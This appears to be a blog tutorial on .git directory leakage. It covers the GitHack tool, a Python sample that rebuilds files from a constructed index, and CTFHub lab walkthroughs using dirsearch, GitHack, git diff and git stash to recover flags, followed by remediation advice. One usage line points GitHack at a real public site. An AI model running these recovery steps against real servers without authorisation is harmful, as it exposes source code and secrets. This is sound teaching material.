74. Git information leakage vulnerability detection and exploitation

Vulnerability introduction

Git is an open source distributed version control system. Running git init in a directory automatically creates a .git subdirectory that records the code change history and related metadata. If the code is deployed to the server without first deleting the .git directory, and the web server serves that directory, an attacker can use it to recover the source code.

Tools

Project address 1: GitHub - lijiejie/GitHack: A `.git` folder disclosure exploit

Tool principle:

  • Parse the .git/index file and collect every (file name, file sha1) pair in the project
  • Download the corresponding object for each sha1 from the .git/objects/ folder
  • Decompress each object with zlib and write the source code out according to the original directory structure
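To make those three steps concrete, here is an added example (my own code, not GitHack's) that builds a constructed in-memory .git layout and then reconstructs the tracked files from it exactly as the tool principle describes. The index header, entry layout and loose-object encoding are standard git formats; the file names and contents are constructed sample data, and the in-memory dict stands in for the directory on disk.

```python
import hashlib
import struct
import zlib

def make_blob(content):
    """Return (sha1_hex, zlib-compressed loose object) exactly as git stores a blob."""
    raw = b"blob %d\0" % len(content) + content
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)

def build_index(files):
    """Construct a minimal v2 index (stat metadata zeroed) from a path -> sha1_hex map."""
    body = struct.pack(">4sII", b"DIRC", 2, len(files))
    for path in sorted(files):
        name = path.encode()
        entry = b"\0" * 40 + bytes.fromhex(files[path]) + struct.pack(">H", len(name)) + name
        entry += b"\0" * ((62 + len(name) + 8) // 8 * 8 - len(entry))  # NUL-pad to 8-byte boundary
        body += entry
    return body + hashlib.sha1(body).digest()  # trailing checksum over the preceding bytes

def parse_index(data):
    """Parse a v2 .git/index and return [(path, sha1_hex)] for every tracked file."""
    sig, version, count = struct.unpack(">4sII", data[:12])
    assert sig == b"DIRC" and version == 2, "only index v2 is handled here"
    entries, pos = [], 12
    for _ in range(count):
        # 62 fixed bytes per entry: 40 bytes of stat metadata, 20-byte sha1, 2-byte flags
        sha1 = data[pos + 40:pos + 60].hex()
        name_len = struct.unpack(">H", data[pos + 60:pos + 62])[0] & 0x0FFF  # low 12 bits
        entries.append((data[pos + 62:pos + 62 + name_len].decode(), sha1))
        pos += (62 + name_len + 8) // 8 * 8
    return entries

def recover(read):
    """index -> objects/xx/yyyy -> zlib: rebuild tracked files. read(relpath) returns bytes."""
    out = {}
    for path, sha in parse_index(read("index")):
        raw = zlib.decompress(read("objects/%s/%s" % (sha[:2], sha[2:])))
        header, _, content = raw.partition(b"\0")  # header is b"blob <size>"
        out[path] = content
    return out

def demo():
    """Constructed sample .git as a dict of relative path -> bytes (stands in for the disk)."""
    files = {"index.php": b"<?php echo 'hi'; ?>\n", "config/db.php": b"<?php $pw = 'EXAMPLE_ONLY';\n"}
    store, shas = {}, {}
    for path, content in files.items():
        shas[path], obj = make_blob(content)
        store["objects/%s/%s" % (shas[path][:2], shas[path][2:])] = obj
    store["index"] = build_index(shas)
    return recover(store.__getitem__)
```

Because the index alone lists every tracked path and hash, exposing even just .git/index tells an outsider the full layout of the deployed code, which is why the directory must never reach the web root.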

Usage examples:

python3 GitHack.py http://www.openssl.org/.git/

Project address 2:GitHub - BugScanTeam/GitHack: .git leak exploitation tool, which can restore historical versions

Tool usage:

Vulnerability cases
Log example

Step 1: Open the lab environment directly; the following page information is shown

CTFHub environment instance | prompt information

Step 2: Scan for directories with dirsearch

python3 dirsearch.py -u http://challenge-ed902de60e85397f.sandbox.ctfhub.com:10800/ -e *

Step 3: The scan results show a .git information leak, so we use GitHack (GitHub - BugScanTeam/GitHack: .git leakage exploitation tool that can restore historical versions) to pull the repository

python2 GitHack.py http://challenge-ed902de60e85397f.sandbox.ctfhub.com:10800/.git/

Step 4: Query the commit history

git log

Step 5: In the log output, find the commit whose message mentions adding the flag, then use the following commands to compare the differences and obtain the flag.

# Version comparison (either argument may be a commit hash or a branch name)
git diff <commit or branch 1> <commit or branch 2>

# Execution example: compare the working tree against the commit that added the flag
git diff 727b1543630ea8e366afb0646dcd24a68273657b

# Version rollback
git reset --hard <commit or branch>

Stash example

This challenge relies on git stash. The command is used when you want to save the current modifications but return to the clean working tree of the last commit: git stash saves the local modifications and resets the working tree to the HEAD commit. Below we use the CTFHub environment to demonstrate:

Step 1: Open the lab address; the following page information is shown

CTFHub environment instance | prompt information

Step 2: Run a directory scan and find that .git information is leaked

python3 dirsearch.py -u http://challenge-3035c4ab094fc730.sandbox.ctfhub.com:10800/ -e *

Step 3: Pull the repository with GitHack

python2 GitHack.py http://challenge-3035c4ab094fc730.sandbox.ctfhub.com:10800/.git/

Step 4: Enter the directory where the recovered source code was written and run git stash list to list all stashes in the Git stash stack. Use this list to decide which stash to restore from.

git stash list

Then use git stash pop to take the most recently saved entry off the stash stack and restore it to the working tree. Since there may be multiple stashes, they are managed as a stack, and pop always restores the most recent one.

git stash pop

Then view the restored file to get the final flag

Index example

Step 1: Open the project link; the following prompt message is shown

CTFHub environment instance | prompt information

Step 2: Run a directory scan using the same method

python3 dirsearch.py -u http://challenge-d9fd1f49efa9f95c.sandbox.ctfhub.com:10800/ -e *

Step 3: Pull the repository with GitHack

python2 GitHack.py http://challenge-d9fd1f49efa9f95c.sandbox.ctfhub.com:10800/.git/

Step 4: Enter the directory and view the recovered files to obtain the flag

Repair suggestions
  • Rotate the information: If sensitive information has been leaked, change it and make sure the new values cannot leak again, for example: change passwords, API keys, database credentials, etc.
  • Review the code: Carefully review the code in the Git repository to ensure that no other sensitive information has been exposed. Sensitive information such as passwords and credentials can be located with the Git command line or the search function of the Git hosting service.
  • Remove permissions: Immediately remove public access to prevent further leakage. Use the Git command line or the Git hosting service (for example: GitHub, GitLab, etc.) to change the access permissions of the repository or make the repository private.
  • Undo the commit: If sensitive information has been committed to a public Git repository, use the Git command line or the hosting service's undo-commit function to remove the commit and delete the sensitive information, then force-push to the Git repository to overwrite the committed history. Note that a rewritten history does not help if the .git directory is still reachable on the server or the secrets have already been copied; rotation remains necessary.

Origin: blog.csdn.net/Fly_hps/article/details/133949333